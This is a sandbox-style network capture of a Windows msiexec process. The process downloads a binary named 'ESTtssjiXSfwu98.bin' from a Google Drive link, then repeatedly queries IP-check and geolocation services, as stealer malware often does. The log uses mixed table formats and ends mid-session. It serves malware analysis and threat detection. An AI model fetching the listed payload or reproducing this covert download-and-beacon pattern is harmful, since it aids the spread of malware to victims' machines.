5 | 192.168.2.8 | 49722 | 132.226.8.169 | 80 | 3504 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:21:31.648511887 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Jan 8, 2025 16:21:32.461195946 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 08 Jan 2025 15:21:32 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49724 | 132.226.8.169 | 80 | 3504 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:21:33.084923983 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Jan 8, 2025 16:21:33.870878935 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 08 Jan 2025 15:21:33 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7 | Source IP: 192.168.2.8 | Source Port: 49726 | Destination IP: 132.226.8.169 | Destination Port: 80 | PID: 3504 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp: Jan 8, 2025 16:21:34.497817039 CET | Bytes transferred: 151 | Direction: OUT | Data:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Timestamp: Jan 8, 2025 16:21:35.484287024 CET | Bytes transferred: 273 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:21:35 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 0 | Source IP: 192.168.2.8 | Source Port: 49709 | Destination IP: 142.250.184.238 | Destination Port: 443 | PID: 3504 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp: 2025-01-08 15:21:18 UTC | Bytes transferred: 216 | Direction: OUT | Data:
    GET /uc?export=download&id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
Timestamp: 2025-01-08 15:21:18 UTC | Bytes transferred: 1920 | Direction: IN | Data:
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 08 Jan 2025 15:21:18 GMT
    Location: https://drive.usercontent.google.com/download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'nonce-YLoAxjVwgMvY-XApkVQdAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID: 1 | Source IP: 192.168.2.8 | Source Port: 49710 | Destination IP: 142.250.181.225 | Destination Port: 443 | PID: 3504 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp: 2025-01-08 15:21:19 UTC | Bytes transferred: 258 | Direction: OUT | Data:
    GET /download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Timestamp: 2025-01-08 15:21:21 UTC | Bytes transferred: 4936 | Direction: IN | Data:
    HTTP/1.1 200 OK
    X-GUploader-UploadID: AFiumC4hXhCUoP6tYuSbu0iENby_WYaYMfQ4jZNv6eZKi50ZUoGtwXKpSCq_6LtboGK6KY2b
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="ESTtssjiXSfwu98.bin"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 273984
    Last-Modified: Tue, 10 Dec 2024 20:01:44 GMT
    Date: Wed, 08 Jan 2025 15:21:21 GMT
    Expires: Wed, 08 Jan 2025 15:21:21 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=Loainw==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID: 2 | Source IP: 192.168.2.8 | Source Port: 49712 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 3504 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp: 2025-01-08 15:21:24 UTC | Bytes transferred: 85 | Direction: OUT | Data:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Timestamp: 2025-01-08 15:21:24 UTC | Bytes transferred: 853 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:21:24 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1664473
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpMzmv6L0iJR6QLJ35B38ZgODs5zDH1G6HewlpIGKW4o5k1Iz6q2EPNkqBRtVrTabdO5WMLdYR%2FzC2IPWntglfyexMPQnFSlUh81vmm2OEFsERpnlh%2BAkBV9REsiCFgz4IbLmV4q"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed2d578f23726e-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=2064&rtt_var=777&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1414728&cwnd=224&unsent_bytes=0&cid=ccd6d2ce012b79f0&ts=169&x=0"
Timestamp: 2025-01-08 15:21:24 UTC | Bytes transferred: 362 | Direction: IN | Data:
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.8  49713        188.114.97.3    443               3504  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-08 15:21:25 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-08 15:21:25 UTC  855                IN         HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:21:25 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1664474
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Bao08XMCsDr1gtoeGcmCFIRTJd7P2GDJTDSg%2ByFntElbsTlpF4mwfEf7jNiZt9T4Dbg0fp1wFCNlK2oxtvMcDmcJJeh8qY%2F43cKgQUWnSfwZWVFWFtkMM5dNMJW%2BJQx30C8Sioo"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed2d5d4d38c42c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1493&rtt_var=573&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1886304&cwnd=232&unsent_bytes=0&cid=fa149766868e5972&ts=168&x=0"
2025-01-08 15:21:25 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.8  49715        188.114.97.3    443               3504  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-08 15:21:26 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-08 15:21:26 UTC  855                IN         HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:21:26 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1664475
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NO3WLc2k%2F4B0RspMSjUUdloFjB4N%2FL00b0MKOos32hOtPFlqlqZDs3F9JAPflDKBRdo8NYz5xpBzodyFgPLa%2B5EhFSsGrzBGPxIfltKo8FWXc0jKPskwAdYEaxDip1Wn88Xb7aSV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed2d667b40431a-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2414&min_rtt=2410&rtt_var=912&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1195251&cwnd=224&unsent_bytes=0&cid=7e385c0233121653&ts=143&x=0"
2025-01-08 15:21:26 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.8  49717        188.114.97.3    443               3504  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-08 15:21:28 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-08 15:21:28 UTC  855                IN         HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:21:28 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1664477
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWTn1MOLV4Z2CNVVe9HU6wEa7aW6Lna3BvX1AXNmGOfOVUcb6P03DvHbO8IiPi6KXiQu%2BRX9bT4CIaiZ818%2F4dWEY8uyT4wSvSxr0DyM5ZzZAyBfb3cF%2BYBWCEYtSE0G0kNzVB5U"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed2d7169536a5e-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1699&rtt_var=648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1676234&cwnd=188&unsent_bytes=0&cid=dc72639c2f45d71a&ts=166&x=0"
2025-01-08 15:21:28 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.8  49719        188.114.97.3    443               3504  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-08 15:21:30 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-08 15:21:30 UTC  857                IN         HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:21:30 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1664479
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UdTZR49IgyEmIwH3LN5Th5LEKNAd%2BJCUGWIx5X7wCHJzy%2Fv3PXXd6Uuhm%2FF34oZAG8RP48lGgSlqLNAl37cHS4Ogg%2BnXfokUXPvZhxucihkTAZVasUT7yGZDDmJLesYY8kDaRiww"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed2d7b3ff9de98-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1457&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1898569&cwnd=212&unsent_bytes=0&cid=a291ecb97c8fa20a&ts=154&x=0"
2025-01-08 15:21:30 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.8  49721        188.114.97.3    443               3504  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-08 15:21:31 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-08 15:21:31 UTC  857                IN         HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:21:31 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1664480
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0erhgb%2FI0fVPiOo3QgzqtuUVfKfexop8ACuR%2FZZARr9b0S6HbQwjJ48CkNFfndxLHxGINZdpZJBxAK%2F9PNY1Hht8Ph31jdc4radYiXIoVvdXixduLpRw6bqGfrG79LUOxzO%2Bwhy0"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed2d8459f57d1a-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=2002&rtt_var=763&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1423001&cwnd=179&unsent_bytes=0&cid=30eebc8bba95207a&ts=138&x=0"
2025-01-08 15:21:31 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.8  49723        188.114.97.3    443               3504  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-08 15:21:32 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-08 15:21:33 UTC  861                IN         HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:21:33 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1664482
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Ff05bje8ZEsJ%2Bbg1m%2F86aFKuYyzyMyteUKy%2F4YVvz4u8w%2FfaOYyXI0vNv37ldRh0VbKCzpzK2OTAZMf3sS4FSkJQPoOPtIpVLdUk6dvdesAp%2B1o3bZsbdBayTVo%2BLwM6XkTXw96"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed2d8d387dc407-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1469&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1928665&cwnd=197&unsent_bytes=0&cid=e28f7d44e5deb097&ts=153&x=0"
2025-01-08 15:21:33 UTC  362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9 | Source IP: 192.168.2.8 | Source Port: 49725 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 3504 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-08 15:21:34 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-08 15:21:34 UTC | 859 | IN | HTTP/1.1 200 OK
